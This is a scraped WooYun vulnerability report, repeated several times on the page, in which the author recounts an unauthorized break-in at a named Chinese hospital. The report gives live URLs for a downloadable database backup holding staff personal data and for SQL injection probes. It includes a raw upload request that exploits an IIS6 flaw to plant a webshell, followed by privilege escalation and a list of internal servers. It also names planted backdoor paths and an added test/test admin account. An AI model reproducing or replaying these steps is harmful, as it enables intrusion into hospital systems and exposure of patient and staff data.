某大型医院可从web入侵到内网渗透 | wooyun-2014-055233| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-055233

漏洞标题：某大型医院可从web入侵到内网渗透

漏洞作者：卡卡

提交时间：2014-04-01 17:38

修复时间：2014-05-16 17:39

公开时间：2014-05-16 17:39

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-04-01：细节已通知厂商并且等待厂商处理中
2014-04-05：厂商已经确认，细节仅向厂商公开
2014-04-15：细节向核心白帽子及相关领域专家公开
2014-04-25：细节向普通白帽子公开
2014-05-05：细节向实习白帽子公开
2014-05-16：细节向公众公开

简要描述：

某大型医院web入侵到内网渗透

详细说明：

首先是数据库备份文件可被下载
链接：

http://xjwww.fmmu.edu.cn/D.rar

我看了下，虽然是很早的数据，但是还是有些信息，各种小护士联系电话，身份证号，住址，姓名.而且对下一步的渗透也埋下了伏笔
第二处就是主站存在明显注入：
漏洞链接：

http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1

加单引号爆错，并且爆出了绝对路径

Microsoft JET Database Engine 错误 '80040e14' 
语法错误 (操作符丢失) 在查询表达式 'uid=1' and sh='1' ORDER BY time DESC' 中。 
D:\西京医院主站20130718\BZXXQ\../inc/cls_main.asp，行 303

进一步确定存在注入
http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 and 1=1
http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 and 1=2
返回结果不同，存在sql注射，刚才我们也得到了数据库结构，所以呢，数据库的所有东西已经一目了然了
第三处问题存在上传漏洞，这个更是致命的，直接getshell
问题链接：

http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp

上传用burp抓包，分析post包，可以看到，对filepath是可控的，由于站点web容器为iis6，所以结合iis6解析漏洞，可以直接getshell

POST /Talents/base/fj_upfile.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
DNT: 1
Referer: http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de3992b201b6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 5402
Host: xjwww.fmmu.edu.cn
Pragma: no-cache
Cookie: _pk_id.46.8753=003ff2d41d9fcfc8.1396338965.1.1396341021.1396338965.; _pk_ses.46.8753=*; CNZZDATA2369866=cnzz_eid%3D472799282-1396338970-%26ntime%3D1396338970%26cnzz_a%3D5%26ltime%3D1396338964750; ASPSESSIONIDSSBBRBDQ=FPFHAHDBMBBCPEOHELFHGLMH
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="filepath"
/UploadFile/
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="act"
upload
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="file1"; filename="a.jpg"
Content-Type: image/gif

修改post包，上传shell

查看源码得到shell地址

上菜刀

简单提权，得到服务器权限

服务器名称            注释
-------------------------------------------------------------------------------
\\BLBSJYS-WEB2072                                                              
\\CLOUD-SQL2008R2      VMware vSphere Database                                 
\\CLOUD-VCENTER        VMware vSphere vCenter                                  
\\CSK-WEB207197                                                                
\\FMHZL-WEB            fmhzl-web                                               
\\FSK-WEB207198                                                                
\\GK-WEB207203                                                                 
\\GXGL-WEB             肝血管瘤                                                
\\HXK-WEB207204                                                                
\\HYX-WEB207199                                                                
\\JYK-WEB207205                                                                
\\JYKSYJPKC-WEB20                                                              
\\LLK-WEB207201                                                                
\\LNBK-WEB207200                                                               
\\MNWK-WEB207207                                                               
\\MZK-WEB207206                                                                
\\NFMK-WEB207196                                                               
\\PFYY-WEB207215                                                               
\\RBH-WEB207222                                                                
\\RK-WEB207195                                                                 
\\SHARE-SERVER                                                                 
\\SXK-WEB207201                                                                
\\SZNK-WEB207197                                                               
\\XGNFMWK-WEB2072                                                              
\\XHWK-WEB207200                                                               
\\XJFCK-WEB                                                                    
\\XJHYX-WEB                                                                    
\\XJMZK-WEB                                                                    
\\XJSSK-WEB                                                                    
\\XJYY-WEB207193                                                               
\\XJYYB-WEB207194                                                              
\\XJZLK-WEB207196                                                              
\\XJZYZ-WEB207195                                                              
\\XSK-WEB207208                                                                
\\XXGWK-WEB207202                                                              
\\YJK-CHINESE-WEB                                                              
\\YJK-ENGLISH-WEB                                                              
\\YJK-WEB207198                                                                
\\YK-WEB207210                                                                 
\\ZLFSZX-WEB20721                                                              
\\ZXWK-WEB207212                                                               
\\ZYK-WEB                                                                      
\\绿盟服务器25510

内网机器可能不止这些，不过如果要是继续下去，各种病人，医院工作人员的个人信息很可能会泄漏，希望能引起重视，另外发现别人的后门
http://xjwww.fmmu.edu.cn/x.asp
本次测试上传后门：
http://xjwww.fmmu.edu.cn/UploadFile/1.asp;20144117046.gif
http://xjwww.fmmu.edu.cn/asp/help.asp
添加管理帐号 test test
原谅我未授权就检测！！！

漏洞证明：

http://xjwww.fmmu.edu.cn/D.rar

明显注入：

http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1

加单引号爆错，并且爆出了绝对路径

Microsoft JET Database Engine 错误 '80040e14' 
语法错误 (操作符丢失) 在查询表达式 'uid=1' and sh='1' ORDER BY time DESC' 中。 
D:\西京医院主站20130718\BZXXQ\../inc/cls_main.asp，行 303

http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp

上传用burp抓包，分析post包，可以看到，对filepath是可控的，由于站点web容器为iis6，所以结合iis6解析漏洞，可以直接getshell

POST /Talents/base/fj_upfile.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
DNT: 1
Referer: http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de3992b201b6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 5402
Host: xjwww.fmmu.edu.cn
Pragma: no-cache
Cookie: _pk_id.46.8753=003ff2d41d9fcfc8.1396338965.1.1396341021.1396338965.; _pk_ses.46.8753=*; CNZZDATA2369866=cnzz_eid%3D472799282-1396338970-%26ntime%3D1396338970%26cnzz_a%3D5%26ltime%3D1396338964750; ASPSESSIONIDSSBBRBDQ=FPFHAHDBMBBCPEOHELFHGLMH
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="filepath"
/UploadFile/
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="act"
upload
-----------------------------7de3992b201b6
Content-Disposition: form-data; name="file1"; filename="a.jpg"
Content-Type: image/gif

修改post包，上传shell

查看源码得到shell地址

上菜刀

简单提权，得到服务器权限

服务器名称            注释
-------------------------------------------------------------------------------
\\BLBSJYS-WEB2072                                                              
\\CLOUD-SQL2008R2      VMware vSphere Database                                 
\\CLOUD-VCENTER        VMware vSphere vCenter                                  
\\CSK-WEB207197                                                                
\\FMHZL-WEB            fmhzl-web                                               
\\FSK-WEB207198                                                                
\\GK-WEB207203                                                                 
\\GXGL-WEB             肝血管瘤                                                
\\HXK-WEB207204                                                                
\\HYX-WEB207199                                                                
\\JYK-WEB207205                                                                
\\JYKSYJPKC-WEB20                                                              
\\LLK-WEB207201                                                                
\\LNBK-WEB207200                                                               
\\MNWK-WEB207207                                                               
\\MZK-WEB207206                                                                
\\NFMK-WEB207196                                                               
\\PFYY-WEB207215                                                               
\\RBH-WEB207222                                                                
\\RK-WEB207195                                                                 
\\SHARE-SERVER                                                                 
\\SXK-WEB207201                                                                
\\SZNK-WEB207197                                                               
\\XGNFMWK-WEB2072                                                              
\\XHWK-WEB207200                                                               
\\XJFCK-WEB                                                                    
\\XJHYX-WEB                                                                    
\\XJMZK-WEB                                                                    
\\XJSSK-WEB                                                                    
\\XJYY-WEB207193                                                               
\\XJYYB-WEB207194                                                              
\\XJZLK-WEB207196                                                              
\\XJZYZ-WEB207195                                                              
\\XSK-WEB207208                                                                
\\XXGWK-WEB207202                                                              
\\YJK-CHINESE-WEB                                                              
\\YJK-ENGLISH-WEB                                                              
\\YJK-WEB207198                                                                
\\YK-WEB207210                                                                 
\\ZLFSZX-WEB20721                                                              
\\ZXWK-WEB207212                                                               
\\ZYK-WEB                                                                      
\\绿盟服务器25510

修复方案：

各种修复把！安全实在不敢恭维。。

版权声明：转载请注明来源卡卡@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2014-04-05 21:33

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-055233

漏洞标题：某大型医院可从web入侵到内网渗透

相关厂商：西京医院

漏洞作者：卡卡

提交时间：2014-04-01 17:38

修复时间：2014-05-16 17:39

公开时间：2014-05-16 17:39

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源卡卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-055233

漏洞标题：某大型医院可从web入侵到内网渗透

相关厂商：西京医院

漏洞作者： 卡卡

提交时间：2014-04-01 17:38

修复时间：2014-05-16 17:39

公开时间：2014-05-16 17:39

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-055233"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 卡卡@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：卡卡

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源卡卡@乌云